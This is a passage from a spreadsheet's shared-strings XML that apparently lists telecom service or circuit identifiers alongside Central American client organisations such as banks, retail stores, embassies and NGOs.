    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_0022</t>
  </si>
  <si>
    <t>ID1287001SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL EL DIVISADERO</t>
  </si>
  <si>
    <t>F4514368</t>
  </si>
  <si>
    <t>1599368OH</t>
  </si>
  <si>
    <t>934900001T</t>
  </si>
  <si>
    <t>INVERSIONES REDIL,S.A.</t>
  </si>
  <si>
    <t>F4512982</t>
  </si>
  <si>
    <t>F4512755</t>
  </si>
  <si>
    <t>20538264</t>
  </si>
  <si>
    <t>1715566OH</t>
  </si>
  <si>
    <t>F4518903</t>
  </si>
  <si>
    <t>F4525379</t>
  </si>
  <si>
    <t>293600011T</t>
  </si>
  <si>
    <t>F4516533</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T_40</t>
  </si>
  <si>
    <t>F4516613</t>
  </si>
  <si>
    <t>F4517115</t>
  </si>
  <si>
    <t>F4520170</t>
  </si>
  <si>
    <t>7900314T</t>
  </si>
  <si>
    <t>7900315T</t>
  </si>
  <si>
    <t>F4524234</t>
  </si>
  <si>
    <t>F4524235</t>
  </si>
  <si>
    <t>F4524236</t>
  </si>
  <si>
    <t>90001904769T</t>
  </si>
  <si>
    <t>F4516246</t>
  </si>
  <si>
    <t>826900034T</t>
  </si>
  <si>
    <t>915400001T</t>
  </si>
  <si>
    <t>RED-CONN MULTISOLUCIONES</t>
  </si>
  <si>
    <t>F4514128</t>
  </si>
  <si>
    <t>F4517450</t>
  </si>
  <si>
    <t>F4517788</t>
  </si>
  <si>
    <t>F4514226</t>
  </si>
  <si>
    <t>F4518907</t>
  </si>
  <si>
    <t>941800001T</t>
  </si>
  <si>
    <t>652300001T</t>
  </si>
  <si>
    <t>BANCO AGRICOLA</t>
  </si>
  <si>
    <t>F4525131</t>
  </si>
  <si>
    <t>F4525132</t>
  </si>
  <si>
    <t>F4516249</t>
  </si>
  <si>
    <t>F4512993</t>
  </si>
  <si>
    <t>64000035T</t>
  </si>
  <si>
    <t>F4518434</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_3G_METRONORTE_ZONA_17</t>
  </si>
  <si>
    <t>F4519982</t>
  </si>
  <si>
    <t>1374338OH</t>
  </si>
  <si>
    <t>ASOCIACION HONDUREÑA PREDICAR Y SANAR PREDISAN</t>
  </si>
  <si>
    <t>90001911154T</t>
  </si>
  <si>
    <t>315900015T</t>
  </si>
  <si>
    <t>F4515739</t>
  </si>
  <si>
    <t>F4517379</t>
  </si>
  <si>
    <t>90001910747T</t>
  </si>
  <si>
    <t>810900001T</t>
  </si>
  <si>
    <t>603300001T</t>
  </si>
  <si>
    <t>HELICOPTEROS DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4519984</t>
  </si>
  <si>
    <t>1437484OH</t>
  </si>
  <si>
    <t>COMIDAS ESPECIALIZADAS -</t>
  </si>
  <si>
    <t>7900330T</t>
  </si>
  <si>
    <t>CONTR0001564848OC</t>
  </si>
  <si>
    <t>F4524302</t>
  </si>
  <si>
    <t>F4525191</t>
  </si>
  <si>
    <t>F4516054</t>
  </si>
  <si>
    <t>CONTR0001936973OC</t>
  </si>
  <si>
    <t>PANASONIC COSTA RICA</t>
  </si>
  <si>
    <t>810600001T</t>
  </si>
  <si>
    <t>UNITED PARCEL SERVICE CO</t>
  </si>
  <si>
    <t>F4517381</t>
  </si>
  <si>
    <t>F4514229</t>
  </si>
  <si>
    <t>F4519190</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3641</t>
  </si>
  <si>
    <t>F4519996</t>
  </si>
  <si>
    <t>F4524822</t>
  </si>
  <si>
    <t>4439295ON</t>
  </si>
  <si>
    <t>23042500SV</t>
  </si>
  <si>
    <t>INDUSTRIAS SAN CHIA,S.A. DE C.V</t>
  </si>
  <si>
    <t>625900007T</t>
  </si>
  <si>
    <t>F4520267</t>
  </si>
  <si>
    <t>981699OH</t>
  </si>
  <si>
    <t>ID1045082SV</t>
  </si>
  <si>
    <t>SOLARIS ENERGY SA DE CV</t>
  </si>
  <si>
    <t>ID1029373SV</t>
  </si>
  <si>
    <t>SERVICIOS FINANCIEROS S.A. DE C.V.</t>
  </si>
  <si>
    <t>406400004T</t>
  </si>
  <si>
    <t>22340500SV</t>
  </si>
  <si>
    <t>F4517370</t>
  </si>
  <si>
    <t>349900297T</t>
  </si>
  <si>
    <t>F4513183</t>
  </si>
  <si>
    <t>F4517817</t>
  </si>
  <si>
    <t>770600218T</t>
  </si>
  <si>
    <t>F4524903</t>
  </si>
  <si>
    <t>F4525117</t>
  </si>
  <si>
    <t>F4516299</t>
  </si>
  <si>
    <t>CC_INVERSIONES_CENTROAMERICANAS_GT_LAS_POZAS_MORALES</t>
  </si>
  <si>
    <t>F4516035</t>
  </si>
  <si>
    <t>90001905521T</t>
  </si>
  <si>
    <t>F4517149</t>
  </si>
  <si>
    <t>1711524OH</t>
  </si>
  <si>
    <t>F4517372</t>
  </si>
  <si>
    <t>IDG000414SV</t>
  </si>
  <si>
    <t>ORGANIZACION INTERNACIONAL PARA LAS MIGRACIONES</t>
  </si>
  <si>
    <t>F4523360</t>
  </si>
  <si>
    <t>357300023T</t>
  </si>
  <si>
    <t>357300024T</t>
  </si>
  <si>
    <t>F4516070</t>
  </si>
  <si>
    <t>F4516195</t>
  </si>
  <si>
    <t>F4516300</t>
  </si>
  <si>
    <t>26459200SV</t>
  </si>
  <si>
    <t>F4514028</t>
  </si>
  <si>
    <t>IP2026131SV</t>
  </si>
  <si>
    <t>626400001T</t>
  </si>
  <si>
    <t>LAATS S.A.</t>
  </si>
  <si>
    <t>592732OH</t>
  </si>
  <si>
    <t>F4517373</t>
  </si>
  <si>
    <t>F4518503</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC004184</t>
  </si>
  <si>
    <t>913400001T</t>
  </si>
  <si>
    <t>TECH CENTER GROUP, SOCIEDAD ANONIMA.</t>
  </si>
  <si>
    <t>F4520174</t>
  </si>
  <si>
    <t>595779OH</t>
  </si>
  <si>
    <t>F4525298</t>
  </si>
  <si>
    <t>8200206T</t>
  </si>
  <si>
    <t>F4517439</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_CHISEC_105</t>
  </si>
  <si>
    <t>ID1383083SV</t>
  </si>
  <si>
    <t>F4517818</t>
  </si>
  <si>
    <t>449700001T</t>
  </si>
  <si>
    <t>EMBAJADA DE CHILE</t>
  </si>
  <si>
    <t>F4525241</t>
  </si>
  <si>
    <t>F4525244</t>
  </si>
  <si>
    <t>47501887T</t>
  </si>
  <si>
    <t>F4516488</t>
  </si>
  <si>
    <t>ID1124116SV</t>
  </si>
  <si>
    <t>F4517359</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_0139</t>
  </si>
  <si>
    <t>F4515006</t>
  </si>
  <si>
    <t>F4518174</t>
  </si>
  <si>
    <t>F4518506</t>
  </si>
  <si>
    <t>298000002T</t>
  </si>
  <si>
    <t>F4524070</t>
  </si>
  <si>
    <t>922184OH</t>
  </si>
  <si>
    <t>F4525304</t>
  </si>
  <si>
    <t>F4516489</t>
  </si>
  <si>
    <t>F4514882</t>
  </si>
  <si>
    <t>F4517360</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0139</t>
  </si>
  <si>
    <t>F4517376</t>
  </si>
  <si>
    <t>F4517436</t>
  </si>
  <si>
    <t>F4514957</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_HUNAPU</t>
  </si>
  <si>
    <t>90001909154T</t>
  </si>
  <si>
    <t>F4518507</t>
  </si>
  <si>
    <t>F4518777</t>
  </si>
  <si>
    <t>4035370ON</t>
  </si>
  <si>
    <t>F4520157</t>
  </si>
  <si>
    <t>826900050T</t>
  </si>
  <si>
    <t>F4512970</t>
  </si>
  <si>
    <t>F4514164</t>
  </si>
  <si>
    <t>47502191T</t>
  </si>
  <si>
    <t>F4515785</t>
  </si>
  <si>
    <t>F4524132</t>
  </si>
  <si>
    <t>F4515629</t>
  </si>
  <si>
    <t>F4512972</t>
  </si>
  <si>
    <t>F4516416</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0154</t>
  </si>
  <si>
    <t>61200233T</t>
  </si>
  <si>
    <t>888300001T</t>
  </si>
  <si>
    <t>PLAN INTERNACIONAL INC</t>
  </si>
  <si>
    <t>F4521082</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_SANLUCAS_LASPUERTAS</t>
  </si>
  <si>
    <t>265900194T</t>
  </si>
  <si>
    <t>470200002T</t>
  </si>
  <si>
    <t>IMARA S.A.</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0747</t>
  </si>
  <si>
    <t>IP2025037SV</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_066</t>
  </si>
  <si>
    <t>11971ON</t>
  </si>
  <si>
    <t>ON0000001916/EMBAJADA DE PANAMA-</t>
  </si>
  <si>
    <t>F4515369</t>
  </si>
  <si>
    <t>71500019T</t>
  </si>
  <si>
    <t>F4516453</t>
  </si>
  <si>
    <t>F4513873</t>
  </si>
  <si>
    <t>F4523635</t>
  </si>
  <si>
    <t>IP2112153SV</t>
  </si>
  <si>
    <t>625900153T</t>
  </si>
  <si>
    <t>90001903360T</t>
  </si>
  <si>
    <t>F4518620</t>
  </si>
  <si>
    <t>F4518884</t>
  </si>
  <si>
    <t>F4522448</t>
  </si>
  <si>
    <t>47502853T</t>
  </si>
  <si>
    <t>F4524039</t>
  </si>
  <si>
    <t>F4525215</t>
  </si>
  <si>
    <t>F4525052</t>
  </si>
  <si>
    <t>1703485OH</t>
  </si>
  <si>
    <t>OH1001071353</t>
  </si>
  <si>
    <t>F4513451</t>
  </si>
  <si>
    <t>F4516459</t>
  </si>
  <si>
    <t>22043800SV</t>
  </si>
  <si>
    <t>F4514262</t>
  </si>
  <si>
    <t>1601183OH</t>
  </si>
  <si>
    <t>90001908027T</t>
  </si>
  <si>
    <t>723287OH</t>
  </si>
  <si>
    <t>F4522870</t>
  </si>
  <si>
    <t>942200001T</t>
  </si>
  <si>
    <t>PORT TO PORT GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4517425</t>
  </si>
  <si>
    <t>F4517446</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_ATL_GASOLINERA_UNO_EL_CONGO</t>
  </si>
  <si>
    <t>936800001T</t>
  </si>
  <si>
    <t>CEMSUR GUATEMALA S.A.</t>
  </si>
  <si>
    <t>90001903556T</t>
  </si>
  <si>
    <t>ID1053036SV</t>
  </si>
  <si>
    <t>PRIMERA IGLESIA BAUTISTA MANAGUA</t>
  </si>
  <si>
    <t>F4518501</t>
  </si>
  <si>
    <t>25219300SV</t>
  </si>
  <si>
    <t>REGISTRO NACIONAL DE LAS PERSONAS NATURALES</t>
  </si>
  <si>
    <t>973222OH</t>
  </si>
  <si>
    <t>F4523977</t>
  </si>
  <si>
    <t>F4525208</t>
  </si>
  <si>
    <t>F4515809</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_PERU_REU</t>
  </si>
  <si>
    <t>F4515811</t>
  </si>
  <si>
    <t>704500001T</t>
  </si>
  <si>
    <t>FEDEX TRANSPORTES EXPRESOS (GUATEMALA)</t>
  </si>
  <si>
    <t>357400012T</t>
  </si>
  <si>
    <t>90001901963T</t>
  </si>
  <si>
    <t>F4519234</t>
  </si>
  <si>
    <t>CC_GMG_CR_CODISA_VPN1</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C191</t>
  </si>
  <si>
    <t>F4524037</t>
  </si>
  <si>
    <t>F4524038</t>
  </si>
  <si>
    <t>F4524206</t>
  </si>
  <si>
    <t>344400282T</t>
  </si>
  <si>
    <t>F4524915</t>
  </si>
  <si>
    <t>571600001T</t>
  </si>
  <si>
    <t>CONVERSIONES S.A.</t>
  </si>
  <si>
    <t>F4515778</t>
  </si>
  <si>
    <t>F4516154</t>
  </si>
  <si>
    <t>F4517134</t>
  </si>
  <si>
    <t>3656200ON</t>
  </si>
  <si>
    <t>ON0000001567/EMPRESA PORTUARIA NACIONAL-</t>
  </si>
  <si>
    <t>F4522641</t>
  </si>
  <si>
    <t>IP2033144SV</t>
  </si>
  <si>
    <t>446100002T</t>
  </si>
  <si>
    <t>F4517442</t>
  </si>
  <si>
    <t>F4518170</t>
  </si>
  <si>
    <t>F4518396</t>
  </si>
  <si>
    <t>F4518398</t>
  </si>
  <si>
    <t>F4518437</t>
  </si>
  <si>
    <t>90001904551T</t>
  </si>
  <si>
    <t>F4523404</t>
  </si>
  <si>
    <t>F4524210</t>
  </si>
  <si>
    <t>829800061T</t>
  </si>
  <si>
    <t>3477118ON</t>
  </si>
  <si>
    <t>F4524935</t>
  </si>
  <si>
    <t>F4517374</t>
  </si>
  <si>
    <t>F4518061</t>
  </si>
  <si>
    <t>90001909395T</t>
  </si>
  <si>
    <t>590300004T</t>
  </si>
  <si>
    <t>FUNDACION DEL AZUCAR-FUNDAZUCAR</t>
  </si>
  <si>
    <t>8901946T</t>
  </si>
  <si>
    <t>F4518217</t>
  </si>
  <si>
    <t>5614385ON</t>
  </si>
  <si>
    <t>F4521412</t>
  </si>
  <si>
    <t>F4523646</t>
  </si>
  <si>
    <t>F4524032</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4229</t>
  </si>
  <si>
    <t>F4516977</t>
  </si>
  <si>
    <t>F4513483</t>
  </si>
  <si>
    <t>IDG000634SV</t>
  </si>
  <si>
    <t>COMDATA EL SALVADOR SA DE CV</t>
  </si>
  <si>
    <t>365400049T</t>
  </si>
  <si>
    <t>F4513022</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_RIO_DULCE_053</t>
  </si>
  <si>
    <t>ID1204037SV</t>
  </si>
  <si>
    <t>VILLALOBOS S.A DE C.V.</t>
  </si>
  <si>
    <t>F4520547</t>
  </si>
  <si>
    <t>1720036OH</t>
  </si>
  <si>
    <t>F4521685</t>
  </si>
  <si>
    <t>F4522176</t>
  </si>
  <si>
    <t>F4522173</t>
  </si>
  <si>
    <t>539700002T</t>
  </si>
  <si>
    <t>1096072OH</t>
  </si>
  <si>
    <t>F4515137</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4027</t>
  </si>
  <si>
    <t>F4516615</t>
  </si>
  <si>
    <t>F4517098</t>
  </si>
  <si>
    <t>8902716T</t>
  </si>
  <si>
    <t>25929000SV</t>
  </si>
  <si>
    <t>F4513159</t>
  </si>
  <si>
    <t>F4513018</t>
  </si>
  <si>
    <t>854500001T</t>
  </si>
  <si>
    <t>PUERTESHON, S.A.</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C196_VISTARES</t>
  </si>
  <si>
    <t>F4521560</t>
  </si>
  <si>
    <t>F4521562</t>
  </si>
  <si>
    <t>8900615T</t>
  </si>
  <si>
    <t>778968OH</t>
  </si>
  <si>
    <t>F4515632</t>
  </si>
  <si>
    <t>316800001T</t>
  </si>
  <si>
    <t>DISTRIBUIDORA NOVATEX S.A.</t>
  </si>
  <si>
    <t>F4516418</t>
  </si>
  <si>
    <t>F4513162</t>
  </si>
  <si>
    <t>F4513163</t>
  </si>
  <si>
    <t>F4520550</t>
  </si>
  <si>
    <t>F4520551</t>
  </si>
  <si>
    <t>882200001T</t>
  </si>
  <si>
    <t>AQUA DIVERSIONES S.A.</t>
  </si>
  <si>
    <t>F4516997</t>
  </si>
  <si>
    <t>F4517340</t>
  </si>
  <si>
    <t>F4513690</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C120</t>
  </si>
  <si>
    <t>F4513692</t>
  </si>
  <si>
    <t>F4521145</t>
  </si>
  <si>
    <t>F4525254</t>
  </si>
  <si>
    <t>F4517030</t>
  </si>
  <si>
    <t>F4517695</t>
  </si>
  <si>
    <t>3894386ON</t>
  </si>
  <si>
    <t>F4515587</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0482</t>
  </si>
  <si>
    <t>F4515650</t>
  </si>
  <si>
    <t>F4515706</t>
  </si>
  <si>
    <t>F4521245</t>
  </si>
  <si>
    <t>1047463OH</t>
  </si>
  <si>
    <t>F4515604</t>
  </si>
  <si>
    <t>F4521688</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0756</t>
  </si>
  <si>
    <t>F4524184</t>
  </si>
  <si>
    <t>F4525053</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0852</t>
  </si>
  <si>
    <t>F4517699</t>
  </si>
  <si>
    <t>CC_APOYO_SV_OPICO</t>
  </si>
  <si>
    <t>F4515335</t>
  </si>
  <si>
    <t>355400018T</t>
  </si>
  <si>
    <t>613391OH</t>
  </si>
  <si>
    <t>47503342T</t>
  </si>
  <si>
    <t>F4513478</t>
  </si>
  <si>
    <t>F4513161</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0228</t>
  </si>
  <si>
    <t>F4520702</t>
  </si>
  <si>
    <t>F4521689</t>
  </si>
  <si>
    <t>F4523160</t>
  </si>
  <si>
    <t>F4524042</t>
  </si>
  <si>
    <t>F4517265</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ALDEA_RACANA_QUICHE</t>
  </si>
  <si>
    <t>F4519183</t>
  </si>
  <si>
    <t>F4517002</t>
  </si>
  <si>
    <t>F4517102</t>
  </si>
  <si>
    <t>F4513060</t>
  </si>
  <si>
    <t>F4518598</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_3G_CC_SANTA_CLARA_BARCENAS_VILLA_NUEVA</t>
  </si>
  <si>
    <t>F4518639</t>
  </si>
  <si>
    <t>F4518932</t>
  </si>
  <si>
    <t>F4521506</t>
  </si>
  <si>
    <t>F4521558</t>
  </si>
  <si>
    <t>CONTR0001491583OC</t>
  </si>
  <si>
    <t>CALCESA SOCIEDAD  DE RESPONSABILIDAD LIMITADA</t>
  </si>
  <si>
    <t>F4521690</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T231</t>
  </si>
  <si>
    <t>5179799ON</t>
  </si>
  <si>
    <t>F4524869</t>
  </si>
  <si>
    <t>8902254T</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C126</t>
  </si>
  <si>
    <t>F4516415</t>
  </si>
  <si>
    <t>625900127T</t>
  </si>
  <si>
    <t>F4513061</t>
  </si>
  <si>
    <t>47504197T</t>
  </si>
  <si>
    <t>F4520005</t>
  </si>
  <si>
    <t>90001901292T</t>
  </si>
  <si>
    <t>F4524867</t>
  </si>
  <si>
    <t>F4524965</t>
  </si>
  <si>
    <t>F4524966</t>
  </si>
  <si>
    <t>F4517698</t>
  </si>
  <si>
    <t>5278268ON</t>
  </si>
  <si>
    <t>CC_PRONE_GT_14_AVENIDA_ZONA13</t>
  </si>
  <si>
    <t>F4515775</t>
  </si>
  <si>
    <t>F4516457</t>
  </si>
  <si>
    <t>ID1030047SV</t>
  </si>
  <si>
    <t>CDM DE EL SALVADOR S.A DE C.V</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_067</t>
  </si>
  <si>
    <t>527100002T</t>
  </si>
  <si>
    <t>527100012T</t>
  </si>
  <si>
    <t>ID1223015SV</t>
  </si>
  <si>
    <t xml:space="preserve">SUPRA CONSTRUCCIONES SA DE CV (SUCURSAL EL SALVADOR)										</t>
  </si>
  <si>
    <t>648400001T</t>
  </si>
  <si>
    <t>ASOCIACION DE SALUD INTEGRAL</t>
  </si>
  <si>
    <t>ID1040028SV</t>
  </si>
  <si>
    <t>ID1126067SV</t>
  </si>
  <si>
    <t>PROYECTOS MESOAMERICA, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4515573</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0237</t>
  </si>
  <si>
    <t>832676OH</t>
  </si>
  <si>
    <t>90001907803T</t>
  </si>
  <si>
    <t>317500005T</t>
  </si>
  <si>
    <t>F4521507</t>
  </si>
  <si>
    <t>F4521626</t>
  </si>
  <si>
    <t>F4522406</t>
  </si>
  <si>
    <t>F4522423</t>
  </si>
  <si>
    <t>8902164T</t>
  </si>
  <si>
    <t>F4524863</t>
  </si>
  <si>
    <t>21500022T</t>
  </si>
  <si>
    <t>F4514827</t>
  </si>
  <si>
    <t>355400010T</t>
  </si>
  <si>
    <t>F4516327</t>
  </si>
  <si>
    <t>1710441OH</t>
  </si>
  <si>
    <t>F4518802</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3702</t>
  </si>
  <si>
    <t>IPG000244SV</t>
  </si>
  <si>
    <t>47502010T</t>
  </si>
  <si>
    <t>F4524864</t>
  </si>
  <si>
    <t>F4524865</t>
  </si>
  <si>
    <t>F4524866</t>
  </si>
  <si>
    <t>F4515572</t>
  </si>
  <si>
    <t>F4518792</t>
  </si>
  <si>
    <t>90001910379T</t>
  </si>
  <si>
    <t>F4523908</t>
  </si>
  <si>
    <t>F4515939</t>
  </si>
  <si>
    <t>F4515856</t>
  </si>
  <si>
    <t>F4516923</t>
  </si>
  <si>
    <t>22217143SV</t>
  </si>
  <si>
    <t>F4517264</t>
  </si>
  <si>
    <t>F4519204</t>
  </si>
  <si>
    <t>F4520051</t>
  </si>
  <si>
    <t>F4522438</t>
  </si>
  <si>
    <t>F4522437</t>
  </si>
  <si>
    <t>625900025T</t>
  </si>
  <si>
    <t>5246696ON</t>
  </si>
  <si>
    <t>F4515940</t>
  </si>
  <si>
    <t>518593OH</t>
  </si>
  <si>
    <t>F4518228</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3383</t>
  </si>
  <si>
    <t>F4518805</t>
  </si>
  <si>
    <t>323800012T</t>
  </si>
  <si>
    <t>F4524031</t>
  </si>
  <si>
    <t>F4524047</t>
  </si>
  <si>
    <t>4439291ON</t>
  </si>
  <si>
    <t>F4525271</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C193</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC000360</t>
  </si>
  <si>
    <t>F4515019</t>
  </si>
  <si>
    <t>F4515784</t>
  </si>
  <si>
    <t>ID1137011SV</t>
  </si>
  <si>
    <t>F4518933</t>
  </si>
  <si>
    <t>ID1183019SV</t>
  </si>
  <si>
    <t>F4521942</t>
  </si>
  <si>
    <t>IP2030006SV</t>
  </si>
  <si>
    <t>ENERGIA BOREALIS S.A. DE C.V.</t>
  </si>
  <si>
    <t>70051OH</t>
  </si>
  <si>
    <t>F4516919</t>
  </si>
  <si>
    <t>F4514030</t>
  </si>
  <si>
    <t>F4513076</t>
  </si>
  <si>
    <t>F4513082</t>
  </si>
  <si>
    <t>F4519043</t>
  </si>
  <si>
    <t>F4520878</t>
  </si>
  <si>
    <t>770600009T</t>
  </si>
  <si>
    <t>1041875OH</t>
  </si>
  <si>
    <t>F4522243</t>
  </si>
  <si>
    <t>8902249T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3832</t>
  </si>
  <si>
    <t>F4513592</t>
  </si>
  <si>
    <t>F4518178</t>
  </si>
  <si>
    <t>F4519106</t>
  </si>
  <si>
    <t>833491OC</t>
  </si>
  <si>
    <t>F4520880</t>
  </si>
  <si>
    <t>5222734ON</t>
  </si>
  <si>
    <t>F4514339</t>
  </si>
  <si>
    <t>770600065T</t>
  </si>
  <si>
    <t>F4513595</t>
  </si>
  <si>
    <t>F4513068</t>
  </si>
  <si>
    <t>F4519107</t>
  </si>
  <si>
    <t>F4519109</t>
  </si>
  <si>
    <t>622700019T</t>
  </si>
  <si>
    <t>CANTATA, S.A. (XT)</t>
  </si>
  <si>
    <t>IPG000094SV</t>
  </si>
  <si>
    <t>GERENCIA AGENCIAS DE EL INTERIOR NUMEROS DE TELECOM</t>
  </si>
  <si>
    <t>4771378ON</t>
  </si>
  <si>
    <t>F4517838</t>
  </si>
  <si>
    <t>1598913OH</t>
  </si>
  <si>
    <t>F4520225</t>
  </si>
  <si>
    <t>39200041T</t>
  </si>
  <si>
    <t>F4514007</t>
  </si>
  <si>
    <t>F4514034</t>
  </si>
  <si>
    <t>F4520536</t>
  </si>
  <si>
    <t>625900006T</t>
  </si>
  <si>
    <t>F4516240</t>
  </si>
  <si>
    <t>F4513733</t>
  </si>
  <si>
    <t>331800156T</t>
  </si>
  <si>
    <t>F4519179</t>
  </si>
  <si>
    <t>877700001T</t>
  </si>
  <si>
    <t>GRUPO SELICO, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4519217</t>
  </si>
  <si>
    <t>F4519879</t>
  </si>
  <si>
    <t>F4519878</t>
  </si>
  <si>
    <t>F4519850</t>
  </si>
  <si>
    <t>90001911284T</t>
  </si>
  <si>
    <t>777700008T</t>
  </si>
  <si>
    <t>F4520332</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0040</t>
  </si>
  <si>
    <t>652800001T</t>
  </si>
  <si>
    <t>BANCO ANTIGUA O SCOTIABANK</t>
  </si>
  <si>
    <t>649100001T</t>
  </si>
  <si>
    <t>F4522973</t>
  </si>
  <si>
    <t>F4523816</t>
  </si>
  <si>
    <t>90001906914T</t>
  </si>
  <si>
    <t>641500001T</t>
  </si>
  <si>
    <t>ALIADOS AGROINDUSTRIALES - ALAISA</t>
  </si>
  <si>
    <t>F4517707</t>
  </si>
  <si>
    <t>458042ON</t>
  </si>
  <si>
    <t>285800002T</t>
  </si>
  <si>
    <t>F4514300</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C126</t>
  </si>
  <si>
    <t>F4515831</t>
  </si>
  <si>
    <t>F4516107</t>
  </si>
  <si>
    <t>IP2136040SV</t>
  </si>
  <si>
    <t>F4516944</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_LA_MAQUINA</t>
  </si>
  <si>
    <t>F4520590</t>
  </si>
  <si>
    <t>F4515545</t>
  </si>
  <si>
    <t>95200004T</t>
  </si>
  <si>
    <t>F4515705</t>
  </si>
  <si>
    <t>318500003T</t>
  </si>
  <si>
    <t>EMBAJADA DE EL SALVADOR</t>
  </si>
  <si>
    <t>F4516113</t>
  </si>
  <si>
    <t>F4517617</t>
  </si>
  <si>
    <t>F4518601</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2052</t>
  </si>
  <si>
    <t>F4523576</t>
  </si>
  <si>
    <t>F4523795</t>
  </si>
  <si>
    <t>F4523971</t>
  </si>
  <si>
    <t>86100092T</t>
  </si>
  <si>
    <t>F4516331</t>
  </si>
  <si>
    <t>F4513064</t>
  </si>
  <si>
    <t>1294427OH</t>
  </si>
  <si>
    <t>F4513085</t>
  </si>
  <si>
    <t>F4518637</t>
  </si>
  <si>
    <t>F4518794</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC004214</t>
  </si>
  <si>
    <t>594548OH</t>
  </si>
  <si>
    <t>F4520561</t>
  </si>
  <si>
    <t>F4520863</t>
  </si>
  <si>
    <t>F4523642</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C174</t>
  </si>
  <si>
    <t>F4524441</t>
  </si>
  <si>
    <t>F4517599</t>
  </si>
  <si>
    <t>8200089T</t>
  </si>
  <si>
    <t>F4514830</t>
  </si>
  <si>
    <t>F4514838</t>
  </si>
  <si>
    <t>CC_HCAMINO_REAL_GT_CENTRAL_Z10</t>
  </si>
  <si>
    <t>619454OH</t>
  </si>
  <si>
    <t>38300600T</t>
  </si>
  <si>
    <t>1108487OH</t>
  </si>
  <si>
    <t>INVERSIONES (Antes FREDDY ELIAS ESPINAL ORDOÑEZ 21 KILATES) )</t>
  </si>
  <si>
    <t>3916013ON</t>
  </si>
  <si>
    <t>F4523181</t>
  </si>
  <si>
    <t>F4523782</t>
  </si>
  <si>
    <t>47503986T</t>
  </si>
  <si>
    <t>90001909331T</t>
  </si>
  <si>
    <t>451339ON</t>
  </si>
  <si>
    <t>F4522142</t>
  </si>
  <si>
    <t>ID1041088SV</t>
  </si>
  <si>
    <t>CDE COMPLEJO EDUCATIVO SAN BARTOLOME APOSTOL</t>
  </si>
  <si>
    <t>F4518615</t>
  </si>
  <si>
    <t>F4514685</t>
  </si>
  <si>
    <t>F4518633</t>
  </si>
  <si>
    <t>25005200SV</t>
  </si>
  <si>
    <t>COSASE, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4515018</t>
  </si>
  <si>
    <t>F4523797</t>
  </si>
  <si>
    <t>F4521080</t>
  </si>
  <si>
    <t>7800415T</t>
  </si>
  <si>
    <t>F4521174</t>
  </si>
  <si>
    <t>F4515942</t>
  </si>
  <si>
    <t>1699977OH</t>
  </si>
  <si>
    <t>OH1000772326/TIENDAS SAN MIGUEL S DE R L -</t>
  </si>
  <si>
    <t>F4521590</t>
  </si>
  <si>
    <t>F4521377</t>
  </si>
  <si>
    <t>F4521802</t>
  </si>
  <si>
    <t>660600006T</t>
  </si>
  <si>
    <t>FCN004H</t>
  </si>
  <si>
    <t>ID1288006SV</t>
  </si>
  <si>
    <t>F4519408</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C159</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C102</t>
  </si>
  <si>
    <t>F4522045</t>
  </si>
  <si>
    <t>F4522526</t>
  </si>
  <si>
    <t>ID1029446SV</t>
  </si>
  <si>
    <t>F4513331</t>
  </si>
  <si>
    <t>CC_GMG_SV_T011_METROCENTRO</t>
  </si>
  <si>
    <t>226100008T</t>
  </si>
  <si>
    <t>F4512808</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C182</t>
  </si>
  <si>
    <t>F4520221</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_0768</t>
  </si>
  <si>
    <t>340500147T</t>
  </si>
  <si>
    <t>F4522244</t>
  </si>
